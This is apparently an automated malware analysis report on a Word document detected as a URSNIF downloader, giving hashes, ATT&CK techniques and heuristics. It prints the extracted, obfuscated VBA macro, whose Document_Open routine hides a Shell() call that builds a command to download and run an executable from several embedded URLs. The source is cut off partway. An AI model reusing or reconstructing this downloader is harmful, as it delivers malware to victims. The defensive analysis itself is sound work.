Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6ccd4c745fb1d6d9…

MALICIOUS

Office (OLE)

66.0 KB Created: 2018-09-09 21:34:00 Authoring application: Microsoft Office Word First seen: 2020-01-07
MD5: 7e6980371f32c621d20998ef8e211bac SHA-1: 593532859a14a3cd2f46eba73f5398641544d551 SHA-256: 6ccd4c745fb1d6d9e1629b3eb80fc7e8286c902e3629f59a3677d3b9375497e0
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a VBA macro that executes a Shell() command, indicating an attempt to download and run a secondary payload. The ClamAV detection name 'Doc.Downloader.URSNIF-6729855-3' strongly suggests a downloader functionality. The presence of a Document_Open macro is a common technique for malicious Office documents.

Heuristics 5

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6057 bytes
SHA-256: 951675fcb9f3573e50177c69a00eefe01041adf6a1b0dcba54dbd5e71260a49c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "vuSIFwbszJr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   Second "351835809" + "Y"
   Second "163092390" + "275047844"
   Second "U" + "izsT" + "mjl" + "WkjA"
   Second "489399104" + "z" + "456788463" + "sbriz"
   Second "p" + "ApKbbv"
   Second "SiQY" + "LhzLJKVfw"
   Second "4226" + "GhPpRwso" + "2344" + "2850"
   Second "6966" + "UriiiXo"
Shell GBjKicIIGV + zTKcw, CStr(vbHide)
   Second "279291282" + "Uwjz"
   Second "93048781" + "93451503"
End Sub



Attribute VB_Name = "vfkCQSP"
Function GBjKicIIGV()

On _
Error _
Resume _
Next
Second "524967727" + "XzatFHFqN" + "vm" + "355600366"
qkNhzYXN = Format(Chr(10 + 5 + 11 + 6 + 67)) + "md /V^" + ":" + "/" + Format(Chr(7 + 3 + 8 + 4 + 45)) + Format(Chr(3 + 1 + 3 + 2 + 25)) + "^s" + "e" + "^t " + "^3^s^H=" + " ^  " + "       " + " ^ ^" + " ^" + " " + " "
Second "5712" + "8037"
HnjWtvi = "^  }^}" + "{" + "h" + Format(Chr(10 + 5 + 11 + 6 + 67)) + "ta" + Format(Chr(10 + 5 + 11 + 6 + 67)) + "}" + "^;^k" + "a" + "erb^" + ";q" + "^j" + "V$ ^me" + "tI-e^k" + "ovn^I" + "^;)^"
Second "19515307" + "459901455" + "LAW" + "QCmBPKHqRL"
hwDdXwjDd = "qjV^$ ^" + ",r^Y" + Format(Chr(7 + 3 + 8 + 4 + 45)) + "^$" + "(" + "^eli" + "^" + "Fdao" + "ln^w" + "^o^D.V" + "n^F^$" + "^{"
Second "7411" + "3981"
   Second "SwO" + "300840454" + "tWQkNzIQ" + "bkmEAJuvHvns"
   Second "iFzCE" + "1468"
   Second "401124317" + "wzwwrQWHC"
fdjwCzYU = "y" + "rt{" + ")^T^wi$" + "^ n^i^ " + "rY" + Format(Chr(7 + 3 + 8 + 4 + 45)) + "^$(^h" + Format(Chr(10 + 5 + 11 + 6 + 67))
Second "jW" + "MK"
   Second "5413" + "5160896" + "pLDaw" + "516094389"
saoblMaBNqu = "^a^e" + "rof^;'" + "^e^x" + "e.^'" + "+^B" + "^" + "d^Y^" + "$+'" + "^\^'+" + Format(Chr(10 + 5 + 11 + 6 + 67)) + "^" + "i" + "lbu^"
Second "487265081" + "310680315"
   Second "8516" + "RwQ" + "313212096" + "8028"
EbarKN = "p^" + ":v" + "n^e" + "$" + "^=^q" + "jV"
Second "hURhfo" + "106245300"
   Second "5076" + "9238" + "429763462" + "2090"
ICqvsiEwp = "$" + "^;^" + "'8^4^3" + "'" + "^ =^ B" + "^" + "dY$;)" + "'^" + "@'(" + "^t^i"
Second "913" + "HS" + "174120826" + "bvj"
   Second "nhvzqrPEn" + "lG"
DjWurD = "^" + "lpS^" + ".'" + Format(Chr(7 + 3 + 8 + 4 + 45)) + "s^" + "4J" + "k" + "^K^o" + "Qt^t/" + Format(Chr(10 + 5 + 11 + 6 + 67)) + Format(Chr(10 + 5 + 11 + 6 + 67))
Second "490019513" + "LqoiLUM"
   Second "9528" + "P"
   Second "252160581" + "idaSa"
   Second "vdP" + "tGMR"
lTuozYwci = ".^t" + "n" + "^e" + Format(Chr(10 + 5 + 11 + 6 + 67)) + "^serou" + "lf/"
Second "35812747" + "7739" + "5981" + "8871"
   Second "kwWP" + "1792"
   Second "MnKjznpmZBf" + "223649770" + "469245664" + "zaDutYPrFFVKp"
tjZvQhT = "/^:^p" + "^tt^h" + "^@Q3rl^" + "k" + Format(Chr(7 + 3 + 8 + 4 + 45)) + "O" + "/^sedul" + Format(Chr(10 + 5 + 11 + 6 + 67)) + "n^i/" + "n^i^" + "md^a-^p" + "w/^m^o" + Format(Chr(10 + 5 + 11 + 6 + 67)) + ".re^mag" + "^i^t^l" + "^u^.^w" + "^ww//^:"
Second "VTT" + "3858"
   Second "bu" + "n"
njzAs = "^p^tt^h" + "@^s" + "^UKz^g^" + "9^TY" + "/^ten." + "gn"
GBjKicIIGV = qkNhzYXN + HnjWtvi + hwDdXwjDd + fdjwCzYU + saoblMaBNqu + EbarKN + ICqvsiEwp + DjWurD + lTuozYwci + tjZvQhT + njzAs
   Second "wEYmhDGQpD" + "AGjHSzrLb"
End Function
Function zTKcw()

On _
Error _
Resume _
Next
Second "h" + "8897"
   Second "7797" + "twItFL" + "48838412" + "309149553"
HvJGVGZtsJC = "ino^k" + "e" + "^i^" + "li^" + "m^a^" + "f//:^p^" + "tt^" + "h^@z^7"
Second "261299664" + "313267778"
   Second "AwX" + "kF" + "nSWT" + "XU"
   Second "qbCK" + "6646"
   Second "w" + "Y" + "124229670" + "6850"
VmTsfjOo = "^G^W" + "N7^" + "Yn/^t" + "n^e" + "tno" + Format(Chr(10 + 5 + 11 + 6 + 67)) + "^-p" + "w/" + "^m^o" + Format(Chr(10 + 5 + 11 + 6 + 67)) + "^." + "a" + "^br^" + "a^b^o^j" + "//^:p" + "tth^@^" + "p8h5"
Second "z" + "Nf" + "494
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.